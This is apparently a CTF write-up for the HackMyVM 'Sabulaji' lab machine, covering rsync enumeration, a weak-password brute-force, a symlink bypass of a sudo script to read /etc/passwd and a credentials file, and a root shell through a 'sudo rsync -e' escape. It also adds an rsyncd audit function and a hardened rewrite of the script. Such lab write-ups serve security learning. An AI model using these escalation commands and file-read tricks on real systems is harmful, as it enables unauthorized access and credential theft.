
HackMyVM-Sabulaji

514 words · 3 min
Tags: Hackmyvm, Linux
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and is committed to continuous learning and growth.

Box Info

OS: Linux
Difficulty: Medium

Nmap

[root@kali] /home/kali/sabulaji  
❯ nmap 192.168.55.88 -sV -A -p-

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp  open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: epages
|_http-server-header: Apache/2.4.62 (Debian)
873/tcp open  rsync   (protocol version 31)

Dirsearch

[root@kali] /home/kali/sabulaji  
❯ dirsearch -u http://192.168.55.88


  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.88/

[03:28:14] Scanning:
[03:28:16] 403 -   278B - /.php
[03:28:23] 200 -    2KB - /index.html
[03:28:27] 403 -   278B - /server-status
[03:28:27] 403 -   278B - /server-status/

Task Completed

Nothing of value here.

Rsync

Now look at port 873. rsync is a fast, powerful remote file synchronization tool, commonly used for backups, mirroring and syncing across a network. List the modules the target exposes:

[root@kali] /home/kali/sabulaji  
❯ rsync 192.168.55.88::

public          Public Files
epages          Secret Documents

The public module can be accessed without a password.
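An anonymous module like public is a configuration decision on the server side. As an added defender's check, not part of the original write-up and not anything from the box, the shell function below reads an rsyncd.conf and reports every module exported without an "auth users" line of its own. It assumes the usual rsyncd.conf layout of [module] sections holding key = value lines; the sample config embedded in demo_audit is constructed here to mirror the two modules seen above.

```shell
#!/bin/sh
# audit_rsyncd CONF: print one line per module in CONF that has no "auth users"
# setting of its own, i.e. a module any client can list and pull from.
# Assumption: modules are [name] sections, settings are "key = value" lines,
# and a per-module "auth users" line is what gates access (rsyncd.conf style).
audit_rsyncd() {
    awk '
        function flush() {
            if (mod != "" && !auth) print mod ": no auth users (anonymous access)"
        }
        /^[ \t]*[#;]/ { next }                        # comment line, ignore
        /^[ \t]*\[/ {                                 # start of a [module] section
            flush()                                   # report the previous module
            mod = $0
            sub(/^[ \t]*\[/, "", mod)
            sub(/\].*$/, "", mod)
            auth = 0
            next
        }
        mod != "" && /^[ \t]*auth[ \t]+users[ \t]*=/ { auth = 1 }
        END { flush() }                               # report the last module
    ' "$1"
}

# demo_audit: run the check over a constructed config with one open module
# (public) and one gated module (epages), the shape this box presented.
demo_audit() {
    conf=$(mktemp)
    cat > "$conf" <<'EOF'
uid = nobody
[public]
    path = /srv/rsync/public
    comment = Public Files
[epages]
    path = /srv/rsync/epages
    comment = Secret Documents
    auth users = sabulaji
    secrets file = /etc/rsyncd.secrets
EOF
    audit_rsyncd "$conf"
    rm -f "$conf"
}
```

Running demo_audit reports only the public module. On a real host the function is pointed at the daemon's own config (typically /etc/rsyncd.conf); the remediation for each reported module is an "auth users" line backed by a "secrets file", plus "hosts allow" where the client set is known.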

[root@kali] /home/kali/sabulaji  
❯ rsync -av rsync://192.168.55.88/public .

receiving incremental file list
./
todo.list

sent 46 bytes  received 552 bytes  1,196.00 bytes/sec
total size is 433  speedup is 0.72

[root@kali] /home/kali/sabulaji  
❯ ls
todo.list

[root@kali] /home/kali/sabulaji  
❯ cat todo.list
To-Do List
=========

1. sabulaji: Remove private sharing settings
   - Review all shared files and folders.
   - Disable any private sharing links or permissions.

2. sabulaji: Change to a strong password
   - Create a new password (minimum 12 characters, include uppercase, lowercase, numbers, and symbols).
   - Update the password in the system settings.
   - Ensure the new password is not reused from other accounts.
=========

This seems to say the current password is still a weak one that was never changed, so try brute-forcing it; the tool below can be used.

Brute-forcing with sabulaji as the username yields the password admin123.

Pull down epages:

[root@kali] /home/kali/sabulaji  
❯ rsync -av rsync://sabulaji@192.168.55.88/epages .

Password: 
receiving incremental file list
./
secrets.doc

sent 46 bytes  received 13,435 bytes  5,392.40 bytes/sec
total size is 13,312  speedup is 0.99

Opening it reveals a password string.

Try logging in as the welcome user (a regular on these boxes).

Own sabulaji

Check sudo:

welcome@Sabulaji:~$ sudo -l
Matching Defaults entries for welcome on Sabulaji:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Sabulaji:
    (sabulaji) NOPASSWD: /opt/sync.sh

Look at the script:

#!/bin/bash

if [ -z $1 ]; then
    echo "error: note missing"
    exit
fi

note=$1

if [[ "$note" == *"sabulaji"* ]]; then
    echo "error: forbidden"
    exit
fi

difference=$(diff /home/sabulaji/personal/notes.txt $note)

if [ -z "$difference" ]; then
    echo "no update"
    exit
fi

echo "Difference: $difference"

cp $note /home/sabulaji/personal/notes.txt

echo "[+] Updated."

It looks like a compare-and-overwrite routine: it diffs a file against notes.txt and copies it over if they differ. Command injection does not seem possible, but the diff output means it can be used to read files.

welcome@Sabulaji:~$ sudo -u sabulaji /opt/sync.sh /etc/passwd
Difference: 0a1,27
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
> _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
> systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
> systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
> systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
> systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
> messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
> sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
> welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
> sabulaji:x:1001:1001::/home/sabulaji:/bin/bash
[+] Updated.

Although the script checks for the string sabulaji, the check can be bypassed with a symlink. I really could not find the file here; after glancing at a walkthrough it turned out to be creds.txt.

welcome@Sabulaji:~$ ln -s /home/sabulaji/personal/creds.txt /home/welcome/test
welcome@Sabulaji:~$ sudo -u sabulaji /opt/sync.sh /home/welcome/test
Difference: 0a1
> Sensitive Credentials:Z2FzcGFyaW4=
[+] Updated.

With the password in hand we can log in.
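Both weaknesses shown in this section, the diff output echoing whatever file is passed in and the name check being defeated by a symlink, are fixable in the script itself. The following hardened rewrite is an added example, not the sync.sh from the box. It assumes that notes may only be submitted from one caller-owned directory (ALLOWED_DIR) and that the owner's notes file lives in NOTES_DIR; both variable names and their default paths are my assumptions.

```shell
#!/bin/bash
# Hardened rewrite of the sync.sh logic. Added example, not the script shipped
# on the machine. Assumptions: the caller may only submit notes that live under
# ALLOWED_DIR, and the owner's notes file is NOTES_DIR/notes.txt.
NOTES_DIR="${NOTES_DIR:-/home/sabulaji/personal}"
ALLOWED_DIR="${ALLOWED_DIR:-/home/welcome/notes}"

# check_note PATH: print the fully resolved path when PATH is acceptable,
# otherwise print an error on stderr and return 1.
check_note() {
    local note="$1" resolved
    if [ -z "$note" ]; then
        echo "error: note missing" >&2
        return 1
    fi
    # Refuse symlinks outright: the original compared the *name* given on the
    # command line, which a symlink in the caller's home trivially hides.
    if [ -L "$note" ]; then
        echo "error: symlinks are not accepted" >&2
        return 1
    fi
    # Resolve ../ and any symlinked parent directory, then require a regular file.
    resolved=$(readlink -f -- "$note") || return 1
    if [ ! -f "$resolved" ]; then
        echo "error: not a regular file" >&2
        return 1
    fi
    # Decide on the resolved path, never on the user-supplied string.
    case "$resolved" in
        "$ALLOWED_DIR"/*) ;;
        *) echo "error: forbidden" >&2; return 1 ;;
    esac
    printf '%s\n' "$resolved"
}

# sync_note PATH: replace the notes file when PATH differs, without printing
# either file's contents (the original echoed the diff, which is exactly what
# turned it into an arbitrary file reader).
sync_note() {
    local resolved
    resolved=$(check_note "$1") || return 1
    if cmp -s -- "$NOTES_DIR/notes.txt" "$resolved"; then
        echo "no update"
        return 0
    fi
    cp -- "$resolved" "$NOTES_DIR/notes.txt" || return 1
    echo "[+] Updated."
}

# Behave like the original when invoked with a note path.
if [ -n "${1:-}" ]; then
    sync_note "$1"
    exit $?
fi
```

The decisive changes are that every decision is made on the resolved path rather than on the string the caller typed, and that the comparison uses cmp -s so no file content ever reaches the caller's terminal. Quoting "$note" also removes the word-splitting the original's unquoted $1 allowed.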

Root

sabulaji@Sabulaji:~$ sudo -l
Matching Defaults entries for sabulaji on Sabulaji:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabulaji may run the following commands on Sabulaji:
    (ALL) NOPASSWD: /usr/bin/rsync

The last step is very simple.

sabulaji@Sabulaji:~$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
# id
uid=0(root) gid=0(root) groups=0(root)
# 